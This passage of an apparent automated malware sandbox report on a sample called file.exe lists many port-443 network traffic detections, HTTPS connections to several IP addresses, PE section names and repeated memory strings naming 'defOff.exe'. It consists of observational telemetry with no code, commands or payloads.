              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
              Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
              Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
              Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
              Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
              Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
              Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
              Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
              Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
              Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
              Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
              Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
              Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
              Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
              Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
              Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
              Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
              Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
              Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
              Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
              Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49940
              Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49939
              Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49938
              Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49937
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49936
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49935
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49934
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49933
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
              Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49876 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49929
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49928
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
              Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49925
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49923
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49922
              Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49921
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49920
              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49877 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49919
              Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49918
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49917
              Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49916
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49915
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49914
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49899 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49909
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49908
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49907
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49906
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49905
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49904
              Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900
              Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 443
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49730 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49731 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49732 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49733 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49734 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49735 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49736 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49737 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 104.21.66.38:443 -> 192.168.2.4:49742 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.4:49759 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 2.16.229.162:443 -> 192.168.2.4:49767 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 13.107.246.63:443 -> 192.168.2.4:49796 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.4:49805 version: TLS 1.2

              System Summary

              barindex
              Source: file.exeStatic PE information: section name:
              Source: file.exeStatic PE information: section name: .idata
              Source: file.exeStatic PE information: section name:
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDC9140_3_00DDC914
              Source: C:\Users\user\Desktop\file.exeCode function: 0_3_00DDC9140_3_00DDC914
              Source: file.exe, 00000000.00000003.1987562902.00000000059ED000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987884473.00000000059F8000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991077977.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001223255.0000000005938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2018357897.0000000005BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992795080.0000000005A39000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985739413.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992933162.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2000602426.0000000005A74000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1992193365.0000000005A2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994423122.0000000005A4D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989197565.0000000005AE1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1996370732.0000000005938000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987670752.0000000005AB1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991319124.0000000005B0A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993107168.0000000005A2E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987340346.0000000005AA1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2017418321.0000000000DEA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991590363.0000000005A27000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997385008.0000000005B87000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988543818.00000000059F9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987232444.00000000059E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994560950.0000000005B60000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991857768.0000000005A26000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994694903.0000000005940000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995143065.0000000005A5C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1998528113.0000000005A65000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1998168997.0000000005933000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990840649.0000000005941000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985365009.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1997141332.0000000005A55000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988102300.00000000059FA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986970195.0000000005936000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985192162.000000000593C000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1999974965.0000000005937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994830043.0000000005A54000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1994246456.0000000005939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988781935.000000000593B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2000312951.0000000005932000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993616160.0000000005B4E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993482935.0000000005A3D000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986482325.0000000005934000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985457273.00000000059CE000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986582822.00000000059D9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2017207813.0000000005544000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1988665682.0000000005AC7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987452872.000000000593A000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990958984.0000000005A2B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995680461.0000000005939000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1987777085.000000000593E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989501410.0000000005A04000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1986383650.0000000005A7E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001825569.0000000005A91000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993357903.0000000005937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1999734134.0000000005BA7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1989822721.000000000593B000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1990720364.0000000005AF1000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.2001434743.0000000005A89000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1991199200.0000000005A1E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1985839879.00000000059CB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1995283693.0000000005937000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
              Source: file.exe, 00000000.00000003.1993924537.0000000005A37000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamedefOff.exe. vs file.exe
